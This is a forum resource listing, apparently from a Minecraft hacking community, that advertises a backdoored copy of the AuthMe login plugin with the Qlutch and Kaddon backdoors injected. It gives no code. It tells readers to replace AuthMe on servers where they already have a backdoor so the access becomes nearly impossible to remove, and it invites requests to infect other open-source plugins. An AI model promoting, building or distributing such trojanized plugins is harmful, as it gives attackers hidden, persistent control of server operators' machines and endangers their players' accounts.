AuthMe

INJECTED AuthMe

No permission to download

AuthMe, but backdoored​

This is the AuthMe plugin, but with Qlutch and Kaddon injected.

(UPDATED VERSION WAS TOO BIG FOR THE FORUMS, GET IT FROM THE DIRECT DL)

AuthMe is a login system used by nearly every cracked server ever. If you get Qlutch injected in a cracked server, just delete their AuthMe and replace it with this one. Qlutch will be nearly impossible to remove!

Installation​

You can install backdoored version of AuthMe by either hosting it yourself or using my direct link:
Content of this hidden block can only be seen by members of: Lite

authme.png


Also, if you got a plugin that you want infected, check if it's open source, if it is then you can suggest that I infect it by going into the Kaddon Discord, and doing "=suggest <plugin-url>"
  • Winner
Reactions: Blackhat
Author
kindled
Downloads
19
Views
304
First release
Last update
Rating
0.00 star(s) 0 ratings

More resources from kindled

Latest updates

  1. Updated inject code

    update or plugin no work